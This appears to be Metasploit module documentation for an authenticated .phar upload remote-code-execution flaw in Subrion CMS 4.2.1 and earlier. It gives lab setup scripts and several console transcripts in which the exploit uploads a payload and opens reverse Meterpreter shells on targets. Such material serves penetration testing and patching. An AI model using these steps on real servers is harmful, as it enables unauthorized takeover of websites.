## Vulnerable Application

The vulnerability affects:

    * Intelliants Subrion CMS Version less than or equal to 4.2.1 (latest unpatched version as of June 14, 2018)

This module was successfully tested on:

    * Subrion CMS v4.1.0 with Docker on Debian 10
    * Subrion CMS v4.1.0 with Docker on Windows 10
    * Subrion CMS v4.2.1 with XAMPP on Windows Server 2016
    * Subrion CMS v4.2.1 with XAMPP on Windows 10
    * Subrion CMS v4.2.1 with LAMP on Debian 10
    * Subrion CMS v4.2.1 with LAMP on Ubuntu 20.04

### Description

This module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower.
The vulnerability is caused by the `.htaccess` file not preventing the execution of `.pht`, `.phar`, and `.xhtml` files.
Files with these extensions are not included in the `.htaccess` blacklist, hence these files can be uploaded and executed to
achieve remote code execution. In this module, a `.phar` file with a randomized name is uploaded and executed to receive a
Meterpreter session on the target. Afterwards, the file deletes itself, except on Windows OSes.

## Setup

### Subrion CMS v4.1.0 Installation with Docker on any OS

The easiest way to install Subrion CMS v4.1.0 on any operating system would be to use the `docker-compose.yml` script below,
which is a slightly modified version provided in the [official repo](https://github.com/intelliants/docker-subrion#-via-docker-compose),
which is also on [DockerHub](https://hub.docker.com/r/intelliants/subrion). The difference is that when container names are specified,
there is no need to use the MySQL container's IP address when setting up the final stage of the installation.

```yml
version: '3'

services:
  subrion:
    image: intelliants/subrion
    container_name: subrion
    links:
      - subriondb:mysql
    ports:
      - 8080:80
    environment:
      SUBRION_DB_PASSWORD: secretpass

  subriondb:
    image: mysql:5.6
    container_name: subriondb
    environment:
      MYSQL_ROOT_PASSWORD: secretpass
```

Run:

```sh
docker-compose up
```

and wait for the containers to complete initialization. Once the containers are up and running, modify
the `/etc/apache2/conf-enabled/docker-php.conf` file and restart the Apache server by executing the following commands:

```sh
docker exec subrion bash -c "sed -i'' 's/<FilesMatch .*/<FilesMatch \\.(php|phar)$>/' /etc/apache2/conf-enabled/docker-php.conf"
docker exec subrion bash -c '/etc/init.d/apache2 reload'
```

The reason for modifying this file is because the default Apache container configuration only allows parsing and execution
of `.php` files, not `.phar` files. The replacement is as follows:

**From matching only `.php` file extensions**

```html
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>
```

**to matching both `.php` and `.phar` file extensions:**

```html
<FilesMatch "\.(php|phar)$">
    SetHandler application/x-httpd-php
</FilesMatch>
```

After this, navigate to `localhost:8080/install` to set up the final installation process.
Verify that the `Pre-Installation Check` passes, accept the `Subrion License`,
and then fill in the following fields in the `Configuration` page:

```
    MySQL Configuration:

    DB Hostname:  subriondb (the MySQL container name)
    DB Username:  root
    DB Password:  secretpass
    DB Name:      subrion
    DB Port:      3306 (default)
    Table Prefix: sbr410_ (default)

    Administrator Configuration:

    Username:  admin
    Password:  123456
    Confirm:   123456
    Email:     anyemail@mail.com
```

Finally, navigate to `http://localhost:8080/panel/` and login as an Administrator to confirm successful setup.

### Subrion CMS v4.2.1 Installation with XAMPP on Windows 10

Install Subrion CMS v4.2.1 with XAMPP by following the steps below:

1. Download and install [XAMPP 7.4.3](https://xampp.en.uptodown.com/windows/download/2196816) or below.

2. Download and expand the [Subrion CMS v4.2.1](https://subrion.org/download/) (or v4.1.5) zip file into the `C:\xampp\htdocs\` folder,
after deleting the default files within.

3. Modify the `C:\xampp\apache\conf\extra\httpd-xampp.conf` file by changing the lines:

```html
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>
```

into

```html
<FilesMatch "\.(php|phar)$">
    SetHandler application/x-httpd-php
</FilesMatch>
```

4. Restart Apache from the XAMPP Control Panel.

5. Now, add a new database with name `subrion` from the PHPMyAdmin page at `http://localhost/phpmyadmin`
and execute the following SQL code:

```sql
CREATE DATABASE subrion;

/* select the 'subrion' database and run the following: */
GRANT ALL PRIVILEGES ON subrion.* TO root@localhost IDENTIFIED BY "" WITH GRANT OPTION; FLUSH PRIVILEGES;
```

6. After this, navigate to `http://localhost/install` to set up the final installation process.
Verify that the `Pre-Installation Check` passes, accept the `Subrion License`,
and then fill in the following fields in the `Configuration` page:

```
    MySQL Configuration:

    DB Hostname:  localhost (default)
    DB Username:  root
    DB Password:  (blank password)
    DB Name:      subrion
    DB Port:      3306 (default)
    Table Prefix: sbr421_ (default)

    Administrator Configuration:

    Username:  admin
    Password:  123456
    Confirm:   123456
    Email:     anyemail@mail.com
```

7. Finally, navigate to `http://localhost:8080/panel/` and login as an Administrator to confirm successful setup.

### Subrion CMS v4.2.1 Installation with LAMP Stack on Debian 10

According to the [official installation page](https://github.com/intelliants/subrion/wiki/Installation),
the setup for [Subrion CMS v4.2.1](http://tools.subrion.org/get/latest.zip) requires at least:

    - Apache Server 1.3 or above (with `mod_rewrite`) installed
    - PHP version 5 or above (with extensions GD lib, XML lib, FreeType installed)
    - MySQL version 4.1 or above

LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above.
Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be
to run the following script on a fresh image of Debian 10 with `sudo` user permissions. To be able to actually
copy and paste the script, `open-vm-tools` and `open-vm-tools-desktop` need to be installed via `apt` if using
VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.

```sh
    #!/bin/bash

    # to be able to copy and paste, and add firewall tool
    sudo apt update -y && sudo apt upgrade -y
    sudo apt install -y vim ufw curl unzip open-vm-tools open-vm-tools-desktop
    sudo systemctl restart ufw
    sudo systemctl enable ufw

    # install mysql v5.7
    # https://computingforgeeks.com/how-to-install-mysql-on-debian-linux-system/?expand_article=1
    wget -P ~/Downloads/ https://dev.mysql.com/get/mysql-apt-config_0.8.18-1_all.deb
    sudo dpkg -i ~/Downloads/mysql-apt-config_0.8.18-1_all.deb
    sudo apt update -y && sudo apt upgrade -y

    # if the above gives an error, run:
    sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 467B942D3A79BD29
    sudo apt update -y && sudo apt upgrade -y

    # NOTE: I installed MySQL 5.7 in my first two attempts on a fresh Debian 10, but can't install it again afterwards because of error:
    # E: Unable to locate package mysql-community-server
    # If this happens, use Docker to serve a MySQL container:
    # sudo apt install -y default-mysql-server docker.io
    # sudo docker run --name subriondb -e MYSQL_ROOT_PASSWORD=root -d mysql:5.7.42-debian
    # sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb
    # mysql -h [SUBRIONDB_IP] -u root -proot
    # mysql -h [SUBRIONDB_IP] -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@[SUBRIONDB_IP] IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'

    # choose mysql-5.7, set root password "root", and allow MySQL remote connections
    sudo apt install -y mysql-community-server 
    sudo ufw allow mysql
    sudo systemctl restart mysql
    sudo systemctl enable mysql

    # install php v7.3 and php extensions, and enable apache module
    # https://computingforgeeks.com/install-php-on-debian-linux-systen/?expand_article=1
    sudo apt update -y && sudo apt upgrade -y
    sudo apt install -y php php-common
    sudo apt install -y php-cli php-fpm php-json php-pdo php-mysql php-zip php-gd  php-mbstring php-curl php-xml php-pear php-bcmath
    sudo apt install -y libapache2-mod-php
    sudo a2enmod php7.*

    # install apache2 v2.4.38
    sudo apt update -y && sudo apt upgrade -y
    sudo apt install -y apache2
    sudo apt install -y libapache2-mod-php
    sudo a2enmod rewrite
    sudo systemctl restart apache2
    sudo systemctl enable apache2

    # create MySQL database for Subrion (with password "root")
    mysql -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@localhost IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'

    # download and install Subrion 4.2.1
    # https://www.vultr.com/docs/install-subrion-cms-with-lamp-stack-on-ubuntu-20-04/
    # https://github.com/intelliants/subrion/wiki/Installation
    sudo mkdir -p /var/www/subrion
    sudo wget -P /var/www/subrion/ https://tools.subrion.org/get/latest.zip
    sudo unzip /var/www/subrion/latest.zip -d /var/www/subrion/
    sudo rm -rf /var/www/subrion/latest.zip
    sudo chown -R www-data:www-data /var/www/subrion

    # create virtual host for serving vulnerable Subrion website
    sudo a2dissite /etc/apache2/sites-available/000-default.conf
    sudo touch /etc/apache2/sites-available/subrion.conf
    sudo bash -c 'cat << EOF > /etc/apache2/sites-available/subrion.conf
    <VirtualHost *:80>
        ServerName subrion-vuln.com
        DocumentRoot "/var/www/subrion"
        <Directory "/var/www/subrion">
            Require all granted
            Options -Indexes +FollowSymLinks
            AllowOverride All
            Order allow,deny
            Allow from all
        </Directory>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
    </VirtualHost>
    EOF'
    sudo a2ensite subrion.conf
    sudo systemctl restart apache2
    echo '127.0.0.1 subrion-vuln.com' | sudo tee -a /etc/hosts

    # navigate to subrion-vuln.com
    python3 -m webbrowser 'http://subrion-vuln.com'
    exit
```

This will set up Subrion CMS 4.2.1 as a virtual host website on `http://subrion-vuln.com` using the LAMP stack:

    - Debian 10
    - Apache Server v2.4.38
    - MySQL v5.7.42
    - PHP v7.3.31

```sh
ismail@debian:/usr/bin$ cat /etc/os-release 
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

ismail@debian:/usr/bin$ /usr/sbin/apache2 -v
Server version: Apache/2.4.38 (Debian)
Server built:   2023-04-21T22:01:00

ismail@debian:/usr/bin$ mysql --version
mysql  Ver 14.14 Distrib 5.7.42, for Linux (x86_64) using  EditLine wrapper

ismail@debian:/usr/bin$ php -v
PHP 7.3.31-1~deb10u4 (cli) (built: Jun 19 2023 19:10:11) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.31, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.31-1~deb10u4, Copyright (c) 1999-2018, by Zend Technologies
```

Once this is done, and the web browser opens up the Subrion CMS installation page at `http://subrion-vuln.com/install`,
fill in the following fields in the `Configuration` page after passing the `Pre-Installation Check` and accepting the `Subrion License`:

```
    DB Hostname:  localhost (default)

    # if using a MySQL Docker container, put in the IP address found from the output of the following command:
    # sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb

    DB Username:  root
    DB Password:  root
    DB Name:      subrion
    DB Port:      3306 (default)
    Table Prefix: sbr421_ (default)

    Administrator Configuration:

    Username:  admin
    Password:  admin
    Confirm:   admin
    Email:     anyemail@mail.com
```

Once the configuration is done, navigate to `http://subrion-vuln.com/panel/` and login as an Administrator to confirm successful setup.

## Verification Steps

1. Install and set up Subrion CMS v4.2.1 as described above.
2. Verify that the Admin Panel login page can be accessed at `http://subrion-vuln.com/panel/`.
3. Start `msfconsole`
4. Do: `use exploit/multi/http/subrion_cms_file_upload_rce`
5. Do: `set RHOSTS [SUBRION_SERVER_IP]`
6. Do: `set RPORT [SUBRION_SERVER_PORT]`
7. Do: `set USERNAME [username]`
8. Do: `set PASSWORD [password]`
9. Do: `set LHOST eth0`
10. Do: `exploit`

## Options

### RPORT (Required)

This is the default HTTP port 80 for the Subrion CMS website.

### TARGETURI (Required)

This is the base path of the Subrion CMS's website. Can be changed in case the files are not installed as a VHost,
for example, in `/var/www/html/subrion/*` and not in `/var/www/subrion/*`

### USERNAME (Required)

This is the username for the Subrion CMS admin panel page, required for exploitation.

### PASSWORD (Required)

This is the password for the Subrion CMS admin panel page, also required for exploitation.

## Scenarios

### Subrion CMS v4.1.0 with Docker on Debian 10

* Using PHP payload - default TARGET 0

```
msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.138
RHOSTS => 192.168.245.138
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.245.138:8080/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.1.0.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 9cedb67d955cadc5fac7dc7ddf32e425
[*] Logging in to Subrion Admin Panel at: http://192.168.245.138:8080/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.245.138:8080/uploads/zftofixpwb.phar
[*] Executing 'zftofixpwb.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.138
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.138:56994) at 2023-07-30 01:56:57 -0400
[+] Successfully executed payload: http://192.168.245.138:8080/uploads/zftofixpwb.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 986c4ddc755b
OS          : Linux 986c4ddc755b 4.19.0-25-amd64 #1 SMP Debian 4.19.289-1 (2023-07-24) x86_64
Meterpreter : php/linux
meterpreter >
```

### Subrion CMS v4.1.0 with Docker on Windows 10

* Using PHP payload - default TARGET 0

```
msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1:8080/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.1.0.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 3e1ab07d6802525ce76747c40f117961
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1:8080/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1:8080/uploads/dckfdvdmrr.phar
[*] Executing 'dckfdvdmrr.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:50985) at 2023-07-30 04:13:51 -0400
[+] Successfully executed payload: http://192.168.29.1:8080/uploads/dckfdvdmrr.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 3514d9412b2d
OS          : Linux 3514d9412b2d 5.15.90.1-microsoft-standard-WSL2 #1 SMP Fri Jan 27 02:56:13 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > 
```

### Subrion CMS v4.2.1 with XAMPP on Windows Server 2016

* Using PHP payload - default TARGET 0

```
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.103/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: JV9hc6PcMf0fO9VF9uqEMkiWQvNBiredsOQuqYtb
[*] Logging in to Subrion Admin Panel at: http://192.168.100.103/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
[*] Executing 'ftxweolrol.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.103
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.103:50048) at 2023-07-27 18:20:46 +0200
[+] Successfully executed payload: http://192.168.100.103/subrion/uploads/ftxweolrol.phar

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN2019
OS          : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
```

### Subrion CMS v4.2.1 with XAMPP on Windows 10

* Using PHP paylod - default TARGET 0

```
msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: xjUlGn2ZDOBA2ZhobPAmuC17wZXpVxyjVsLBqF54
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/wvkjygteyz.phar
[*] Executing 'wvkjygteyz.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:51466) at 2023-07-30 03:24:33 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/wvkjygteyz.phar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DESKTOP-50BU5J8
OS          : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > 
```

### Subrion CMS v4.2.1 with LAMP Stack on Debian 10

* Using PHP paylod - default TARGET 0

```
msf6 > use exploit/multi/http/subrion_cms_file_upload_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.133
RHOSTS => 192.168.245.133
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
LHOST => 192.168.245.128
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.245.133:80/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[+] The target appears to be vulnerable.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: mKMUcUoMJjRxTxOog8DXxeFxLGQVU7rHSX6slM85
[*] Logging in to Subrion Admin Panel at: http://192.168.245.133/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.245.133/uploads/htwgmjllep.phar
[*] Executing 'htwgmjllep.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.133
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.133:53698) at 2023-07-21 14:21:17 -0400
[+] Successfully executed payload: http://192.168.245.133/uploads/htwgmjllep.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > 
```

### Subrion CMS v4.2.1 on Ubuntu 20.04 (Exfiltrated from Proving Grounds Practice)

* Using PHP paylod - default TARGET 0

```
msf6 > use exploit/multi/http/subrion_cms_file_upload_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.195.163
RHOSTS => 192.168.195.163
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LPORT 80
LPORT => 80
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.45.162:80 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.195.163:80/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[+] The target appears to be vulnerable.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: rtPDWFrHa45hIhhXhLknM7DbWiHqAfux1fziFd3j
[*] Logging in to Subrion Admin Panel at: http://192.168.195.163/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.195.163/uploads/ixqywjyjyd.phar
[*] Executing 'ixqywjyjyd.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.195.163
[*] Meterpreter session 1 opened (192.168.45.162:80 -> 192.168.195.163:57658) at 2023-07-24 10:35:58 -0400
[+] Successfully executed payload: http://192.168.195.163/uploads/ixqywjyjyd.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : exfiltrated
OS          : Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 2489 created.
Channel 0 created.
cat /etc/os-release               
NAME="Ubuntu"
VERSION="20.04.2 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.2 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
```
